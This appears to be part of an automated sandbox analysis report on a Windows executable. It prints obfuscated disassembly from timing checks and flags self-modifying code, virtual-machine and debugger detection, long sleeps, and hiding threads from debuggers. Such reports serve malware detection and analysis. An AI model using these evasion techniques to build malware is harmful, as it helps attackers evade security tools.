Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5128C second address: 4D512D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F0E05506CEEh 0x00000010 jne 00007F0E760E5111h 0x00000016 pushad 0x00000017 mov cx, 8B5Dh 0x0000001b mov bh, ch 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F0E05506CF0h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D512D4 second address: 4D51385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2994h 0x00000007 call 00007F0E055074FDh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esi] 0x00000012 jmp 00007F0E05507507h 0x00000017 mov dword ptr [edx], eax 0x00000019 jmp 00007F0E05507506h 0x0000001e mov eax, dword ptr [esi+04h] 0x00000021 jmp 00007F0E05507500h 0x00000026 mov dword ptr [edx+04h], eax 0x00000029 pushad 0x0000002a mov ebx, esi 0x0000002c push eax 0x0000002d mov di, 0C1Ch 0x00000031 pop ebx 0x00000032 popad 0x00000033 mov eax, dword ptr [esi+08h] 0x00000036 pushad 0x00000037 pushad 0x00000038 movzx eax, bx 0x0000003b push ebx 0x0000003c pop eax 0x0000003d popad 0x0000003e call 00007F0E05507505h 0x00000043 mov ah, 81h 0x00000045 pop edi 0x00000046 popad 0x00000047 mov dword ptr [edx+08h], eax 0x0000004a jmp 00007F0E05507508h 0x0000004f mov eax, dword ptr [esi+0Ch] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51385 second address: 4D51389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51389 second address: 4D5138F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5138F second address: 4D5139E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5139E second address: 4D513BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E05507500h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D513BB second address: 4D513C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D513C1 second address: 4D513C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D513C5 second address: 4D513E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E05506CF4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D513E6 second address: 4D5141C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E05507501h 0x00000008 pop esi 0x00000009 mov si, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+10h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0E05507506h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5141C second address: 4D514B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0E05506CEBh 0x00000013 jmp 00007F0E05506CF3h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [edx+14h], eax 0x0000001d jmp 00007F0E05506CF6h 0x00000022 mov eax, dword ptr [esi+18h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F0E05506CEDh 0x0000002c and cx, 1976h 0x00000031 jmp 00007F0E05506CF1h 0x00000036 popfd 0x00000037 popad 0x00000038 mov dword ptr [edx+18h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F0E05506CF8h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D514B2 second address: 4D514B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D514B6 second address: 4D514BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D514BC second address: 4D514CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E055074FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D514CD second address: 4D5153D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+1Ch] 0x0000000e pushad 0x0000000f jmp 00007F0E05506CECh 0x00000014 pushfd 0x00000015 jmp 00007F0E05506CF2h 0x0000001a sbb cl, FFFFFF88h 0x0000001d jmp 00007F0E05506CEBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [edx+1Ch], eax 0x00000027 pushad 0x00000028 mov si, 301Bh 0x0000002c popad 0x0000002d mov eax, dword ptr [esi+20h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F0E05506CF8h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5153D second address: 4D51543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51543 second address: 4D51547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51547 second address: 4D515AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b jmp 00007F0E05507509h 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 jmp 00007F0E055074FEh 0x00000018 mov dword ptr [edx+24h], eax 0x0000001b jmp 00007F0E05507500h 0x00000020 mov eax, dword ptr [esi+28h] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0E05507507h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D515AB second address: 4D515F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c pushad 0x0000000d mov eax, 603B0B03h 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 mov ecx, dword ptr [esi+2Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F0E05506CEAh 0x00000021 add al, FFFFFFC8h 0x00000024 jmp 00007F0E05506CEBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D515F5 second address: 4D516C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007F0E055074FEh 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 jmp 00007F0E05507500h 0x0000001a mov word ptr [edx+30h], ax 0x0000001e pushad 0x0000001f mov bx, si 0x00000022 mov dx, si 0x00000025 popad 0x00000026 mov ax, word ptr [esi+32h] 0x0000002a pushad 0x0000002b jmp 00007F0E05507502h 0x00000030 mov cx, D601h 0x00000034 popad 0x00000035 mov word ptr [edx+32h], ax 0x00000039 jmp 00007F0E055074FCh 0x0000003e mov eax, dword ptr [esi+34h] 0x00000041 pushad 0x00000042 mov dh, ah 0x00000044 popad 0x00000045 mov dword ptr [edx+34h], eax 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F0E05507502h 0x0000004f xor ax, 1D78h 0x00000054 jmp 00007F0E055074FBh 0x00000059 popfd 0x0000005a mov ebx, ecx 0x0000005c popad 0x0000005d test ecx, 00000700h 0x00000063 pushad 0x00000064 mov ebx, esi 0x00000066 push eax 0x00000067 push ebx 0x00000068 pop ecx 0x00000069 pop edi 0x0000006a popad 0x0000006b jne 00007F0E760E555Eh 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F0E05507501h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D516C8 second address: 4D51700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007F0E05506CF3h 0x0000000b jmp 00007F0E05506CF3h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51700 second address: 4D5175A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, ax 0x00000007 popad 0x00000008 mov bl, ch 0x0000000a popad 0x0000000b or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000f pushad 0x00000010 movsx ebx, si 0x00000013 call 00007F0E055074FEh 0x00000018 mov bx, cx 0x0000001b pop ecx 0x0000001c popad 0x0000001d or dword ptr [edx+40h], FFFFFFFFh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F0E05507506h 0x0000002a adc esi, 22820158h 0x00000030 jmp 00007F0E055074FBh 0x00000035 popfd 0x00000036 movzx ecx, bx 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5175A second address: 4D5178A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05506CF0h 0x00000009 sbb cl, FFFFFFB8h 0x0000000c jmp 00007F0E05506CEBh 0x00000011 popfd 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5178A second address: 4D51790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51790 second address: 4D51796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51796 second address: 4D5179A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5179A second address: 4D5179E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5179E second address: 4D517C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, 6265h 0x00000010 jmp 00007F0E05507502h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D400C5 second address: 4D400EB instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F0E05506CECh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E05506CEEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5182A second address: 4D5184B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov ecx, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E055074FFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5184B second address: 4D5184F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5184F second address: 4D51855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D51919 second address: 4D5191D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D5191D second address: 4D5182A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, esi 0x00000008 popad 0x00000009 retn 0008h 0x0000000c push 0042F258h 0x00000011 push edi 0x00000012 mov dword ptr [00434D64h], eax 0x00000017 call esi 0x00000019 mov edi, edi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0E055074FEh 0x00000022 sbb al, 00000008h 0x00000025 jmp 00007F0E055074FBh 0x0000002a popfd 0x0000002b mov ch, C8h 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0E05507507h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D90218 second address: 4D902CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop edi 0x0000000a pushfd 0x0000000b jmp 00007F0E05506CF2h 0x00000010 sub al, 00000068h 0x00000013 jmp 00007F0E05506CEBh 0x00000018 popfd 0x00000019 popad 0x0000001a mov bx, cx 0x0000001d popad 0x0000001e mov dword ptr [esp], ebp 0x00000021 pushad 0x00000022 mov ax, 5157h 0x00000026 pushad 0x00000027 mov ah, CBh 0x00000029 pushfd 0x0000002a jmp 00007F0E05506CEFh 0x0000002f sub eax, 0D989F5Eh 0x00000035 jmp 00007F0E05506CF9h 0x0000003a popfd 0x0000003b popad 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f pushad 0x00000040 call 00007F0E05506CECh 0x00000045 mov cx, B4B1h 0x00000049 pop esi 0x0000004a jmp 00007F0E05506CF7h 0x0000004f popad 0x00000050 pop ebp 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F0E05506CF5h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D90151 second address: 4D90180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E055074FBh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0E05507500h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D90180 second address: 4D90184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D90184 second address: 4D9018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D9018A second address: 4D901AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E05506CEAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D901AC second address: 4D901B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D901B2 second address: 4D400C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 mov ecx, 5CC32CCFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f mov edx, eax 0x00000011 pushfd 0x00000012 jmp 00007F0E05506CECh 0x00000017 jmp 00007F0E05506CF5h 0x0000001c popfd 0x0000001d popad 0x0000001e jmp dword ptr [7598155Ch] 0x00000024 mov edi, edi 0x00000026 push ebp 0x00000027 mov ebp, esp 0x00000029 mov ecx, dword ptr fs:[00000018h] 0x00000030 mov eax, dword ptr [ebp+08h] 0x00000033 mov dword ptr [ecx+34h], 00000000h 0x0000003a cmp eax, 40h 0x0000003d jnc 00007F0E05506CEDh 0x0000003f mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000046 pop ebp 0x00000047 retn 0004h 0x0000004a test eax, eax 0x0000004c je 00007F0E05506D03h 0x0000004e mov eax, dword ptr [00432010h] 0x00000053 cmp eax, FFFFFFFFh 0x00000056 je 00007F0E05506CF9h 0x00000058 mov esi, 0042F218h 0x0000005d push esi 0x0000005e call 00007F0E09E45457h 0x00000063 mov edi, edi 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 mov bx, A0BCh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D30CB8 second address: 4D30CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov ax, bx 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E05507501h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D30CD7 second address: 4D30D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E05506CEAh 0x00000009 sub si, A5F8h 0x0000000e jmp 00007F0E05506CEBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0E05506CF5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D30D13 second address: 4D30D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 4D30D19 second address: 4D30D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\4kahanaK78.exeSpecial instruction interceptor: First address: 81C851 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exeSpecial instruction interceptor: First address: 81C922 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exeSpecial instruction interceptor: First address: 9C27D8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exeSpecial instruction interceptor: First address: 9C24BD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exeSpecial instruction interceptor: First address: 9C9604 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exeSpecial instruction interceptor: First address: A46BCD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\4kahanaK78.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00AA30A3 rdtsc 0_2_00AA30A3
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow / User API: threadDelayed 2116Jump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeWindow / User API: threadDelayed 1987Jump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5856Thread sleep count: 56 > 30Jump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5856Thread sleep time: -112056s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4832Thread sleep count: 63 > 30Jump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4832Thread sleep time: -126063s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4368Thread sleep count: 188 > 30Jump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5620Thread sleep count: 2116 > 30Jump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5620Thread sleep time: -4234116s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4672Thread sleep count: 1987 > 30Jump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 4672Thread sleep time: -3975987s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5040Thread sleep count: 55 > 30Jump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exe TID: 5040Thread sleep time: -110055s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_00415D07 FindFirstFileExW,0_2_00415D07
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\4kahanaK78.exeCode function: 0_2_04B55F6E FindFirstFileExW,0_2_04B55F6E
Source: 4kahanaK78.exe, 4kahanaK78.exe, 00000000.00000002.3306653109.00000000009A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.drBinary or memory string: VMware
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 4kahanaK78.exe, 00000000.00000002.3307314841.0000000000E45000.00000004.00000020.00020000.00000000.sdmp, 4kahanaK78.exe, 00000000.00000002.3309317789.0000000005590000.00000004.00000020.00020000.00000000.sdmp, 4kahanaK78.exe, 00000000.00000002.3309317789.00000000055A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.drBinary or memory string: vmci.sys
Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.drBinary or memory string: VMware20,1
Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 4kahanaK78.exe, 00000000.00000002.3306653109.00000000009A1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\4kahanaK78.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\4kahanaK78.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\4kahanaK78.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
